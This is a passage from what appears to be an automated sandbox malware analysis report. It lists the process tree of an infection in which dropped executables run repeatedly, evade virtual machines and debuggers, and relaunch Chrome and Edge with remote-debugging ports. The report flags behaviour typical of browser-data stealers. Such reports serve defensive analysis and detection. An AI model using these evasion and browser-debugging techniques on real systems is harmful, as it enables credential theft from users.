        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10360
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10368
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10376
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10384
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10392
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10400
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10408
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10416
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10424
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10432
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10440
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10448
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10456
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10464
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10472
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10480
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10488
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10496
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10504
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10512
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10520
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10528
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10536
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10544
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10560
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10568
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10576
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10584
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10608
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10616
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10624
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10632
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10640
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10648
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10656
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10664
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10672
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10680
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10688
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10696
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10704
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10712
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10720
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10728
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10736
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10744
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10752
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10760
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10768
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10776
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10784
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10792
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:224
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:348
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:3672
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffd103ccc40,0x7ffd103ccc4c,0x7ffd103ccc58
      4⤵
      PID:2928
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1948 /prefetch:2
      4⤵
      PID:1456
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2232 /prefetch:3
      4⤵
      PID:2704
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2304 /prefetch:8
      4⤵
      PID:3520
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3484 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5240
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5436
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4280,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4620 /prefetch:8
      4⤵
      PID:5564
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4540,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
      4⤵
      PID:5608
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4792,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4604 /prefetch:8
      4⤵
      PID:5776
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5036 /prefetch:8
      4⤵
      PID:5864
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5160 /prefetch:8
      4⤵
      PID:5968
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5108 /prefetch:8
      4⤵
      PID:6024
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5096,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5380 /prefetch:8
      4⤵
      PID:6064
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5368,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5376 /prefetch:8
      4⤵
      PID:2092
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5168,i,6532127111789122447,1102844580570331254,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4852 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:7036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x1c4,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:7092
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
      4⤵
      PID:5604
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2520 /prefetch:2
      4⤵
      PID:5520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2712 /prefetch:2
      4⤵
      PID:5340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:8
      4⤵
      PID:5260
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3204 /prefetch:2
      4⤵
      PID:8
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3304
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3200 /prefetch:2
      4⤵
      PID:5984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3060 /prefetch:2
      4⤵
      PID:6236
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3060 /prefetch:2
      4⤵
      PID:6292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14376048211449315234,5581987937811370444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3200 /prefetch:2
      4⤵
      PID:6336
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
